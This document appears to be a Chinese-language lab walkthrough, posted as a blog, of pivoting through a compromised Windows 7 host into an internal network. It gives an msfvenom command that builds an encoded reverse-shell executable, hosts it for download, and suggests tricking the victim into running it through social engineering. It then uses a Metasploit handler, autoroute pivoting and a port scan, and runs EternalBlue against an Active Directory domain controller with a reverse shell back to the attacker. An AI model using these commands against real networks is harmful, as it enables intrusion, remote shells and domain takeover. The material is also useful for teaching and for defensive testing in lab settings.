描述: 这里利用已经控制的一台计算机作为入侵内网的跳板机,在其他内网主机看来访问全部来自于跳板机。以入侵的点作为一个支点,然后横向攻击对内网不能上网的电脑执行恶意攻击。 环境准备: 路由器1跟路由器2分别部署在网关,做了源地址转换为客户提供上网,其中R1作为黑客的出口边界,黑客为了达到目的,在边界路由器上开了针对于自己攻击机两个端口,80,4444 路由器2部分,只是做了源地址转换,只允许win7的电脑可以上网,其他的电脑均无法上网。win7到内网所有主机都能够正常通信。 实验开始: 1.现在kali上面生成一个恶意程序a.exe,注意这里的lhost要填写R1的wan地址。 msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.0.245 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o .exe 生成之后的程序拷贝的apache目录里面,能够让用户可以正常下载。 2.通过社工等方式发给对方,诱骗让其去下载这个程序,在win7上打开浏览器输入 http://172.16.0.245/a.exe 将程序下载到本地。 3.在kali中通过监听的方式来让win7主动链接自己的4444端口。主要对方点击这个程序即可。 命令:use exploit/multi/handler。注意这里的lhost添加本机即可。如下拿到shell 4.这里添加一条路由,目的是以win7作为跳板机,kali后面要在win7所在的内网其他主机进行横向渗透的时候都通过这个路由将数据包丢给win7,然后在由win7对内网进行攻击。所以这个路由很关键,可以看做是连通到内网的一条隧道。 因为我们已经拿到win7的shell了,所以能够看到win7所在网卡的网段,直接添加路由即可。 命令:run autoroute -s 2.2.2.0/24 5.查看一下路由是否添加成功 命令:run autoroute -p 6.background退出,然后我们内网进行主机在线扫描。看看哪些主机在线。因为扫描会占用太多的时间,这里我们有针对的扫描,地址:2.2.2.9-2.2.2.12 。端口:139,445 命令:use auxiliary/scanner/portscan/tcp 7.看是扫描,能够看到,10/11/12这三个主机存活,其中10主机就是我们的win7电脑这是跳板机不管。9主机是不存活主机。 8.知道哪些主机存活了,接下来我们可以利用永恒之蓝攻击对内网进行继续渗透,拿到更多的shell。 这里我们攻击AD域控12主机。 调整永恒之蓝攻击参数,这里我们的攻击对象是12,但是反弹地址要添加跳板机地址,而且端口要是我们R1上面端口映射的4444端口。 9,执行攻击之后,成功拿到了AD域控的shell 10.此时我们到AD域控上看一下链接端口能够发现,12一直在跟10建立4444端口通信。 11.因为这里在R2设定的是所有主机都可以上网,所以我们做一个拓展,在永恒之蓝攻击模块中, 将lhost设定为172.16.0.45R1的WAN口地址。 12.然后开始攻击,这时候kali会将数据包通过之前设定的run autoroute -s 2.2.2.0/24 路由丢给win7,然后在win7将数据包丢给AD,AD直接进行反弹链接172.16.0.45的4444端口,漏洞利用成功。 13.此时我们可以看一下AD上面的端口连接 附:这只是个人认为比较好用的一种方法,如有不同观点或者疑问欢迎来攻,一起进步,谢谢! |